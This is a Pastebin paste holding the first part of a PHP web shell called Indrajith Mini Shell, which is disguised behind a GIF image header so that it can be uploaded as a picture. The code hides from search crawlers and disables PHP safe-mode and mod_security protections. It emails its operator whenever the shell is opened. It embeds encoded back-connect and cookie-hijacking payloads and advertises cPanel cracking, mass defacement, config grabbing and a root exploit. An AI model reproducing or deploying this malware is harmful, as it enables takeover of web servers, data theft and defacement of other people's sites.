toxic_mask

my shell

Aug 3rd, 2017
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 196.78 KB | None | 0 0
  1. GIF89a?????????????????????!??????????????,?????????????????????D???;
  2.  
  3. ????
  4.  
  5. <?php
  6. /*
  7. * Indrajith Mini Shell V.2.0 Without Remote Object
  8. *
  9. * Indrajith Mini Shell v.2.0 with additional features....
  10. * originally scripted by AJITH KP
  11. * (c) Under Gnu General Public Licence 3(c)
  12. * Team Open Fire and Indishell Family
  13. * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
  14. * Indishell : ASHELL, D@rkwolf.
  15. * THA : THA RUDE [There is Nothing in Borders]
  16. * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Komputer Korner Friends.
  17. */
  18.  
  19. /*------------------ LOGIN -------------------*/
  20.  
  21. $username="ajithkp560";
  22. $password="ajithkp560";
  23. $email="ajithkp560@gmail.com";
  24.  
  25. /*------------------ Login Data End ----------*/
  26.  
  27. function Zip($source, $destination) /* Thanks to Alix Axel, http://www.php.net */
  28. {
  29. if (!extension_loaded('zip') || !file_exists($source)) {
  30. return false;
  31. }
  32.  
  33. $zip = new ZipArchive();
  34. if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  35. return false;
  36. }
  37.  
  38. $source = str_replace('\\', '/', realpath($source));
  39.  
  40. if (is_dir($source) === true)
  41. {
  42. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  43.  
  44. foreach ($files as $file)
  45. {
  46. $file = str_replace('\\', '/', realpath($file));
  47.  
  48. if (is_dir($file) === true)
  49. {
  50. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  51. }
  52. else if (is_file($file) === true)
  53. {
  54. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  55. }
  56. }
  57. }
  58. else if (is_file($source) === true)
  59. {
  60. $zip->addFromString(basename($source), file_get_contents($source));
  61. }
  62.  
  63. return $zip->close();
  64. }
  65.  
  66. if(isset($_GET['zip'])) {
  67. $src = $_GET['zip'];
  68. $dst = getcwd()."/".basename($_GET['zip']).".zip";
  69. if (Zip($src, $dst) != false) {
  70. $filez = file_get_contents($dst);
  71. header("Content-type: application/octet-stream");
  72. header("Content-length: ".strlen($filez));
  73. header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  74. echo $filez;
  75. }
  76. exit;
  77. }
  78.  
  79. @error_reporting(4);
  80.  
  81. /*------------------ Anti Crawler ------------*/
  82. if(!empty($_SERVER['HTTP_USER_AGENT']))
  83. {
  84. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  85. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  86. {
  87. header('HTTP/1.0 404 Not Found');
  88. exit;
  89. }
  90. }
  91. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  92. /*------------------ End of Anti Crawler -----*/
  93.  
  94.  
  95.  
  96. echo "<link href= rel=icon type=image/x-icon />";
  97. echo "<div id=divAlert></div>";
  98. echo "<style>
  99. html { background:url() black; }
  100. #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:relative; top:250px; }
  101. input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  102. loginbox td { border-radius:5px; font-size:11px; }
  103. .header { size:25px; color:green; }
  104. h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  105. h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  106. .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  107. .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  108. hr { border:1px solid #222222; }
  109. #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  110. #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  111. #meunlist li { margin: 0px; padding: 0px; display: inline; }
  112. #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  113. #meunlist a:hover { background: #333; color:green; }
  114. .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }
  115. .menu { font-size:25px; color: }
  116. .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
  117. .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
  118. .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  119. #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  120. .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  121. .table a{ text-decoration:none; color:green; font-size:15px; }
  122. .table a:hover{text-decoration:underline;}
  123. .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  124. .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  125. .table tr:hover{ background:#181818; }
  126. .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }
  127. .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  128. .tbl a:hover{text-decoration:underline;}
  129. .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }
  130. .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  131. .tbl td:hover{ background:#181818; }
  132. #alert {position: relative;}
  133. #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  134. #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  135. #alert:target {display: none;}
  136. .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  137. .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  138. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  139. #divAlert { background-color:green; color:white;}
  140. </style>";
  141. if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
  142. {
  143. if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
  144. {
  145. print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  146. if($email!="")
  147. {
  148. mail_alert();
  149. }
  150. }
  151. else
  152. {
  153. if($_POST['usrname'])
  154. {
  155. print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  156. }
  157. echo '<title>INDRAJITH SHELL v.2.0</title><center>
  158. <div id=loginbox><p><font face="verdana,arial" size=-1>
  159. <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  160. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  161. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
  162. <tr><td bgcolor="black" style="padding:5">
  163. <form method="post">
  164. <input type="hidden" name="action" value="login">
  165. <input type="hidden" name="hide" value="">
  166. <center><table>
  167. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  168. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  169. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  170. </div><br /></center>';
  171. exit;
  172. }
  173. }
  174.  
  175. $color_g="green";
  176. $color_b="4C83AF";
  177. $color_bg="#111111";
  178. $color_hr="#222";
  179. $color_wri="green";
  180. $color_rea="yellow";
  181. $color_non="red";
  182. $path=$_GET['path'];
  183.  
  184. @session_start();
  185. @ini_set('max_execution_time',0);
  186. @ini_set('memory_limit','999999999M');
  187. @set_time_limit(0);
  188. @ini_restore("safe_mode_include_dir");
  189. @ini_restore("safe_mode_exec_dir");
  190. @ini_restore("disable_functions");
  191. @ini_restore("allow_url_fopen");
  192. @ini_restore("safe_mode");
  193. @ini_restore("open_basedir");
  194. @ignore_user_abort(FALSE);
  195. @ini_set('zlib.output_compression','Off');
  196.  
  197. $sep="/";
  198. if(strtolower(substr(PHP_OS,0,3))=="win")
  199. {
  200. $os="win";
  201. $sep="\\";
  202. $ox="Windows";
  203. }
  204. else
  205. {
  206. $os="nix";
  207. $ox="Linux";
  208. }
  209.  
  210.  
  211.  
  212. $self=$_SERVER['PHP_SELF'];
  213. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  214. $your_ip=$_SERVER['REMOTE_ADDR'];
  215. $srvr_ip=$_SERVER['SERVER_ADDR'];
  216. $admin=$_SERVER['SERVER_ADMIN'];
  217.  
  218. $s_php_ini="safe_mode=OFF
  219. disable_functions=NONE";
  220.  
  221. $ini_php="<?
  222. echo ini_get(\"safe_mode\");
  223. echo ini_get(\"open_basedir\");
  224. include(\$_GET[\"file\"]);
  225. ini_restore(\"safe_mode\");
  226. ini_restore(\"open_basedir\");
  227. echo ini_get(\"safe_mode\");
  228. echo ini_get(\"open_basedir\");
  229. include(\$_GET[\"ss\"]);
  230. ?>";
  231.  
  232. $s_htaccess="<IfModule mod_security.c>
  233. Sec------Engine Off
  234. Sec------ScanPOST Off
  235. </IfModule>";
  236.  
  237. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  238. AddType application/x-httpd-cgi .sh
  239. AddHandler cgi-script .pl
  240. AddHandler cgi-script .pl";
  241.  
  242. $sym_htaccess="Options all
  243. DirectoryIndex Sux.html
  244. AddType text/plain .php
  245. AddHandler server-parsed .php
  246. AddType text/plain .html
  247. AddHandler txt .html
  248. Require None
  249. Satisfy Any";
  250.  
  251. $sym_php_ini="safe_mode=OFF
  252. disable_functions=NONE";
  253.  
  254. $forbid_dir="Options -Indexes";
  255.  
  256. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  257. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  258.  
  259. /*----------------------- Top Menu ------------------------------------------*/
  260.  
  261. if($safemode=="On")
  262. {
  263. echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  264. }
  265. else
  266. {
  267. echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  268. }
  269.  
  270. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  271.  
  272. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
  273. <table>
  274. <tbody>
  275. <tr>
  276. <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  277. <div style='text-align:center;'>
  278. <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  279. </div>
  280. </td>
  281. <td>
  282. <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  283. ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  284. Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  285. MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  286. echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  287. echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  288. echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  289. echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  290. echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  291. echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  292. echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  293. <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  294. if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); }
  295. else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
  296. echo "
  297. </div>
  298. </td>
  299. </tr>
  300. </tbody>
  301. </table></div>";
  302. echo "<div class='menubar'> <div id=\"meunlist\">
  303. <ul>
  304. <li><a href=\"?\">HOME</a></li>
  305. <li><a href=\"?symlink\">SymLink</a></li>
  306. <li><a href=\"?rs\">((( Connect )))</a></li>
  307. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  308. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  309. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
  310. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
  311. </ul>
  312. <ul>
  313. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  314. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  315. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  316. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
  317. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  318. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  319. </ul>
  320. <ul>
  321. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
  322. <li><a href=\"?sshman\">SSH Shell</a></li>
  323. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
  324. <li><a href=\"?ftpman\">FTP Manager</a></li>
  325. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
  326. <li><a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a></li>
  327. <li><a href=\"?config_grab\">Config Grabber</a></li>
  328. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  329. </ul>
  330. </div></div>";
  331. /*----------------------- End of Top Menu -----------------------------------*/
  332.  
  333.  
  334. /*--------------- FUNCTIONS ----------------*/
  335. function alert($alert_txt)
  336. {
  337. echo "<div id=divAlert>".$alert_txt."</div>";
  338. echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  339. }
  340.  
  341. function disabled_functns()
  342. {
  343. if(!@ini_get('disable_functions'))
  344. {
  345. echo "None";
  346. }
  347. else
  348. {
  349. echo @ini_get('disable_functions');
  350. }
  351. }
  352.  
  353.  
  354. function drivesx()
  355. {
  356. foreach(range('A','Z') as $drive)
  357. {
  358. if(is_dir($drive.':\\'))
  359. {
  360. echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  361. }
  362. }
  363. }
  364.  
  365. function mail_alert()
  366. {
  367. global $email, $your_ip;
  368. $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  369. $content_mail="Hello Master,\n
  370. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
  371. By Indrajith";
  372. mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
  373. }
  374.  
  375. function filesizex($size)
  376. {
  377. if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  378. elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  379. elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  380. else $size .= " B";
  381. return $size;
  382. }
  383.  
  384. function disc_size()
  385. {
  386. echo filesizex(disk_total_space("/"));
  387. }
  388.  
  389. function freesize()
  390. {
  391. echo filesizex(disk_free_space("/"));
  392. }
  393.  
  394. function file_perm($filz){
  395. if($m=fileperms($filz)){
  396. $p='';
  397. $p .= ($m & 00400) ? 'r' : '-';
  398. $p .= ($m & 00200) ? 'w' : '-';
  399. $p .= ($m & 00100) ? 'x' : '-';
  400. $p .= ($m & 00040) ? 'r' : '-';
  401. $p .= ($m & 00020) ? 'w' : '-';
  402. $p .= ($m & 00010) ? 'x' : '-';
  403. $p .= ($m & 00004) ? 'r' : '-';
  404. $p .= ($m & 00002) ? 'w' : '-';
  405. $p .= ($m & 00001) ? 'x' : '-';
  406. return $p;
  407. }
  408. else return "?????";
  409. }
  410.  
  411.  
  412. function mysqlx()
  413. {
  414. if(function_exists('mysql_connect'))
  415. {
  416. echo "<font color='red'>Enabled</font>";
  417. }
  418. else
  419. {
  420. echo "<font color='green'>Disabled</font>";
  421. }
  422. }
  423.  
  424. function oraclesx()
  425. {
  426. if(function_exists('oci_connect'))
  427. {
  428. echo "<font color='red'>Enabled</font>";
  429. }
  430. else
  431. {
  432. echo "<font color='green'>Disabled</font>";
  433. }
  434. }
  435.  
  436. function mssqlx()
  437. {
  438. if(function_exists('mssql_connect'))
  439. {
  440. echo "<font color='red'>Enabled</font>";
  441. }
  442. else
  443. {
  444. echo "<font color='green'>Disabled</font>";
  445. }
  446. }
  447.  
  448. function postgreyx()
  449. {
  450. if(function_exists('pg_connect'))
  451. {
  452. echo "<font color='red'>Enabled</font>";
  453. }
  454. else
  455. {
  456. echo "<font color='green'>Disabled</font>";
  457. }
  458. }
  459.  
  460. function strip($filx)
  461. {
  462. if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
  463. return trim(urldecode(stripslashes($filx)));
  464. }
  465.  
  466. function curlx()
  467. {
  468. if(function_exists('curl_version'))
  469. {
  470. echo "<font color='red'>Enabled</font>";
  471. }
  472. else
  473. {
  474. echo "<font color='green'>Disabled</font>";
  475. }
  476. }
  477.  
  478. function filesize_x($filex)
  479. {
  480. $f_size=filesizex(filesize($filex));
  481. return $f_size;
  482. }
  483.  
  484. function rename_ui()
  485. {
  486. $rf_path=$_GET['rename'];
  487. echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  488. }
  489.  
  490. function filemanager_bg()
  491. {
  492. global $sep, $self;
  493. $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  494. $dirs=array();
  495. $fils=array();
  496. if(is_dir($path))
  497. {
  498. chdir($path);
  499. if($handle=opendir($path))
  500. {
  501. while(($item=readdir($handle))!==FALSE)
  502. {
  503. if($item=="."){continue;}
  504. if($item==".."){continue;}
  505. if(is_dir($item))
  506. {
  507. array_push($dirs, $path.$sep.$item);
  508. }
  509. else
  510. {
  511. array_push($fils, $path.$sep.$item);
  512. }
  513. }
  514. }
  515. else
  516. {
  517. alert("Access Denied for this operation");
  518. }
  519. }
  520. else
  521. {
  522. alert("Directory Not Found!!!");
  523. }
  524. echo "<div id=result><table class=table>
  525. <tr>
  526. <th width='500px'>Name</th>
  527. <th width='100px'>Size</th>
  528. <th width='100px'>Permissions</th>
  529. <th width='500px'>Actions</th>
  530. </tr>";
  531. foreach($dirs as $dir)
  532. {
  533. echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
  534. <td>".filesize_x($dir)."</td>
  535. <td><a href='{$self}?path={$path}&amp;perm={$dir}'>".file_perm($dir)."</a></td>
  536. <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a> | <a href='{$self}?zip={$dir}'> Download </a></td></tr>";
  537. }
  538. foreach($fils as $fil)
  539. {
  540. echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>".basename($fil)."</a></td>
  541. <td>".filesize_x($fil)."</td>
  542. <td><a href='{$self}?path={$path}&amp;perm={$fil}'>".file_perm($fil)."</a></td>
  543. <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a> | <a href='{$self}?zip={$fil}'> Download </a> </td>";
  544. }
  545. echo "</tr></table></div>";
  546. }
  547.  
  548. function rename_bg()
  549. {
  550. if(isset($_GET['old_name']) && isset($_GET['new_name']))
  551. {
  552. $o_r_path=basename($_GET['old_name']);
  553. $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  554. $r_new_name=$r_path.$_GET['new_name'];
  555. echo $r_new_name;
  556. if(rename($_GET['old_name'], $r_new_name)==FALSE)
  557. {
  558. alert("Access Denied for this action!!!");
  559. }
  560. else
  561. {
  562. alert("Renamed File Succeessfully");
  563. }
  564. }
  565. }
  566.  
  567. function edit_file()
  568. {
  569. $path=$_GET['path'];
  570. chdir($path);
  571. $edt_file=$_GET['edit'];
  572. $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  573. if($e_content)
  574. {
  575. $o_content=$e_content;
  576. }
  577. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  578. {
  579. $fd = fopen($edt_file, "rb");
  580. if(!$fd)
  581. {
  582. alert("Permission Denied");
  583. }
  584. else
  585. {
  586. while(!feof($fd))
  587. {
  588. $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  589. }
  590. }
  591. fclose($fd);
  592. }
  593. echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  594. <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  595. <input class='input_big' name='save' type='submit' value=' Save ' /><br /><br /><hr /><br /><br /></div>";
  596. }
  597. function edit_file_bg()
  598. {
  599. if(file_exists($_POST['e_file']))
  600. {
  601. $handle = fopen($_POST['e_file'],"w+");
  602. if (!handle)
  603. {
  604. alert("Permission Denied");
  605. }
  606. else
  607. {
  608. fwrite($handle,$_POST['e_content_n']);
  609. alert("Your changes were Successfully Saved!");
  610. }
  611. fclose($handle);
  612. }
  613. else
  614. {
  615. alert("File Not Found!!!");
  616. }
  617. }
  618. function delete_file()
  619. {
  620. $del_file=$_GET['del_fil'];
  621. if(unlink($del_file) != FALSE)
  622. {
  623. alert("Deleted Successfully");
  624. exit;
  625. }
  626. else
  627. {
  628. alert("Access Denied for this Operation");
  629. exit;
  630. }
  631. }
  632. function deldirs($d_dir)
  633. {
  634. $d_files= glob($d_dir.'*', GLOB_MARK);
  635. foreach($d_files as $d_file)
  636. {
  637. if(is_dir($d_file))
  638. {
  639. deldirs($d_file);
  640. }
  641. else
  642. {
  643. unlink($d_file);
  644. }
  645. }
  646. if(is_dir($d_dir))
  647. {
  648. if(rmdir($d_dir))
  649. {
  650. alert("Deleted Directory Successfully");
  651. }
  652. else
  653. {
  654. alert("Access Denied for this Operation");
  655. }
  656. }
  657. }
  658.  
  659. function code_viewer()
  660. {
  661. $path=$_GET['path'];
  662. $r_file=$_GET['read'];
  663. $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  664. if($r_content)
  665. {
  666. $rr_content=$r_content;
  667. }
  668. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  669. {
  670. $fd = fopen($r_file, "rb");
  671. if (!$fd)
  672. {
  673. alert("Permission Denied");
  674. }
  675. else
  676. {
  677. while(!feof($fd))
  678. {
  679. $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  680. }
  681. }
  682. fclose($fd);
  683. }
  684. echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
  685. }
  686. function copy_file_ui()
  687. {
  688. echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  689. }
  690. function copy_file_bg()
  691. {
  692. global $sep;
  693. if(function_exists(copy))
  694. {
  695. if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  696. {
  697. alert("Succeded");
  698. }
  699. else
  700. {
  701. alert("Access Denied");
  702. }
  703. }
  704. }
  705. function ch_perm_bg()
  706. {
